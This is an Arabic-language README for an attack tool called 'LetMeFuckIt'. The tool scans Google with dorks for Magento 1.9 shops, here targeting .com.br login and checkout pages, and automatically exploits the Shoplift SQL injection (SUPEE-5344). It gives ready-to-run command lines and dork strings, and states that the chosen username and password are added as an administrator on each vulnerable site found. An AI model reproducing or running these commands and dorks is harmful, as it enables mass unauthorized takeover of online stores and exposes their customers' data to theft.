
ماسح واستغلال لـ Magento 1.9
الماسح الضوئي واستغلال Magento
يقوم الماسح الضوئي باستكشاف ثغرة SQLi Vulnerability (1.9.1.0 CE) الخاصة بـ Magento.
تم إصلاح الثغرة في التصحيح SUPEE-5344، ومع ذلك، فإن الماسح الضوئي يُستخدم لتحديد واختبار الأنظمة التي لم تطبق التصحيح الأمني.
تمت كتابة LetMeFuckIt بلغة Python ويستخدم المكتبات التالية:
pygoogle, argparse, urllib2, requests, base64
letmefuckit.py --dork <dork> --pages <number> --user <user> --pwd <pass>
letmefuckit.py --dork "inurl:customer/account/login/ site:com.br" --pages 4 --user adm --pwd pass
--dork --user --pwd --pages --help
"inurl:/customer/account/login site:com.br"
"inurl:/checkout/onepage/ site:com.br"
من خلال الدورك المُدخلة، يتم إجراء مسح في Google، ويتم حفظ عناوين URL في ملف urls.txt، والتي يتم اختبارها تلقائيًا لاحقًا.
يتم إضافة المستخدمين المقدمين أثناء التنفيذ تلقائيًا كمسؤولين في المواقع الضعيفة.
إذا واجهت الخطأ أدناه، فذلك لأن الماسح الضوئي يستخدم مكتبة pygoogle، وهذه المكتبة قديمة بالنسبة لنظام واجهة برمجة التطبيقات الجديد من Google، حيث أصبح من الضروري الآن وجود مفتاح لاستخدام واجهة البرمجة.
pygoogle ERROR __search__| responseDetails : Suspected Terms of Service Abuse. Please see http://code.google.com/apis/errors
إذا ظهر الخطأ، فانتظر دقيقة أو دقيقتين فقط. سيعود الماسح الضوئي إلى العمل الطبيعي.
الاستغلال: ثغرة Magento Shoplift exploit (SUPEE-5344) بواسطة Manish Kishan Tanwar AKA error1046 بتاريخ 25/08/2015
LetMeFuckIt Scanner AutoPwned بواسطة OntheFrontLine بتاريخ 27/09/2015